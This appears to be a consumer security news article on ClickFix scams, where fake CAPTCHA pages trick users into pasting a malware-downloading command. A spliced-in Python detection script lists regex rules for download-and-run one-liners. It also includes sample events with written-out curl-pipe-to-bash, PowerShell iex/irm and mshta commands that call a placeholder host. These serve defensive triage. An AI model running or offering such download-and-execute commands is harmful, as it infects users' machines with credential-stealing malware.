BREAKINGON

Beware the ClickFix Scam: The New Threat Targeting Your Computer

11/11/2025
Scammers are using a new method called ClickFix to infect computers with malware. Learn how to protect yourself from these cunning attacks that bypass traditional security measures.

Beware of ClickFix Scams: A Growing Threat to Computer Users

Over the past year, scammers have significantly ramped up a new method to infect computers of unsuspecting individuals. This increasingly prevalent tactic, which many potential victims remain unaware of, is rapid, bypasses most endpoint protections, and targets both macOS and Windows users. Known as ClickFix, this scheme often begins with an email from a hotel where the target has a pending registration, referencing accurate registration details. In other instances, ClickFix attacks may initiate through a WhatsApp message or even a URL appearing at the top of Google search results.

How ClickFix Scams Operate

Once the target accesses the malicious site, they are confronted with a CAPTCHA challenge or another pretext that necessitates user confirmation. The user is then instructed to copy a string of text, open a terminal window, paste it, and hit Enter. Just one line of code is all it takes for the attacker to gain access. Upon execution, this string causes the PC or Mac to stealthily connect to a server controlled by the scammer and download malware without the user's knowledge. This leads to an infection typically involving credential-stealing malware.

Security Concerns and Growth Factors

Security firms report that ClickFix campaigns are proliferating at an alarming rate. The combination of low awareness regarding this technique, the fact that links often originate from recognized addresses or appear in search engine results, and the ability to evade certain endpoint protections are all contributing factors to this surge. Researchers from CrowdStrike noted, “This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors.”

Malware Types and Techniques Used

One particular malware variant associated with this campaign is a credential-stealer identified as Shamos. Other malicious payloads include a fraudulent cryptocurrency wallet, software that allows the Mac to become part of a botnet, and modifications to macOS configurations that enable the malware to operate each time the machine restarts. Another campaign documented by Sekoia targeted Windows users by compromising hotel accounts on platforms like Booking.com. Attackers used the information from these accounts to contact individuals with pending reservations, fostering immediate trust among victims who may feel pressured to follow instructions to prevent cancellation.

How ClickFix Exploits Trust

Once victims engage with the malicious site, they encounter a fake CAPTCHA notification that closely resembles those from reputable content delivery networks like Cloudflare. The notification instructs users to copy a string of text and paste it into the Windows terminal. This action leads to an infection with malware known as PureRAT. Meanwhile, a ClickFix campaign reported by Push Security adapts its landing page based on the device being used, delivering tailored payloads for either Windows or macOS. Many of these payloads are categorized as LOLbins (living-off-the-land binaries), which leverage native operating system capabilities to carry out attacks without writing malicious files to disk, further complicating detection by endpoint protection tools.
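
Because the pasted one-liner runs through native tools rather than a dropped file, defenders often look at process command lines instead. The sketch below is an added example, not code from this article or the researchers it cites: it triages process-creation events for download-and-run one-liners and raises the priority when the command descends from an app a person pastes into. The rule patterns, the "ancestor" field, the interactive-app list and the sample events are all constructed assumptions.

```python
import re

# Heuristic patterns for pasted download-and-run one-liners. These are
# illustrative assumptions, not indicators taken from the campaigns above.
RULES = {
    "pipe-to-shell": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b", re.I),
    "powershell-download-exec": re.compile(
        r"(?=.*\b(?:iex|invoke-expression)\b)"
        r"(?=.*\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b)",
        re.I),
    "mshta-remote": re.compile(r"\bmshta(?:\.exe)?\s+[\"']?https?://", re.I),
}

# Apps a person types or pastes into (assumed list; tune per environment).
INTERACTIVE = {"explorer.exe", "windowsterminal.exe", "terminal", "iterm2"}

def triage(events):
    """Return (host, rule, priority) for each command line matching a rule.

    Priority is "high" when the command descends from an interactive app,
    which is how a pasted ClickFix command appears, and "review" when it
    comes from automation such as a build agent.
    """
    findings = []
    for ev in events:
        for name, pattern in RULES.items():
            if pattern.search(ev["cmd"]):
                interactive = ev["ancestor"].lower() in INTERACTIVE
                findings.append(
                    (ev["host"], name, "high" if interactive else "review"))
                break  # one finding per event is enough for triage
    return findings

# Constructed process-creation events; hosts and URLs are placeholders.
# "ancestor" is a hypothetical field: the app at the root of the process chain.
SAMPLE_EVENTS = [
    {"host": "mac-01", "ancestor": "Terminal",
     "cmd": '/bin/bash -c "curl -fsSL https://example.invalid/verify | bash"'},
    {"host": "win-07", "ancestor": "explorer.exe",
     "cmd": 'powershell -c "iex (irm https://example.invalid/captcha)"'},
    {"host": "win-09", "ancestor": "explorer.exe",
     "cmd": "mshta https://example.invalid/check.hta"},
    {"host": "mac-02", "ancestor": "Terminal",
     "cmd": "curl -O https://example.invalid/report.pdf"},
    {"host": "build-3", "ancestor": "jenkins-agent",
     "cmd": "curl -fsSL https://example.invalid/setup.sh | bash"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The plain file download on mac-02 is not flagged, and the build agent's pipe-to-shell is kept for review rather than alerting, since legitimate installers use the same form.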

Understanding User Vulnerability

The effectiveness of these attacks is amplified by a general lack of awareness. Over the years, users have become cautious about links in emails or messages, but this skepticism often does not extend to sites that instruct them to copy and paste text into an unfamiliar terminal. When such instructions come from emails tied to known hotels or appear at the top of Google results, victims can easily be caught off guard.

Stay Informed and Protected

As families gather for various holiday celebrations in the coming weeks, it’s essential to inform loved ones about ClickFix scams, especially those who seek security advice. While tools like Microsoft Defender and other endpoint protection programs offer some level of defense, they can sometimes be bypassed. Therefore, increasing awareness remains the most effective countermeasure against these sophisticated scams.
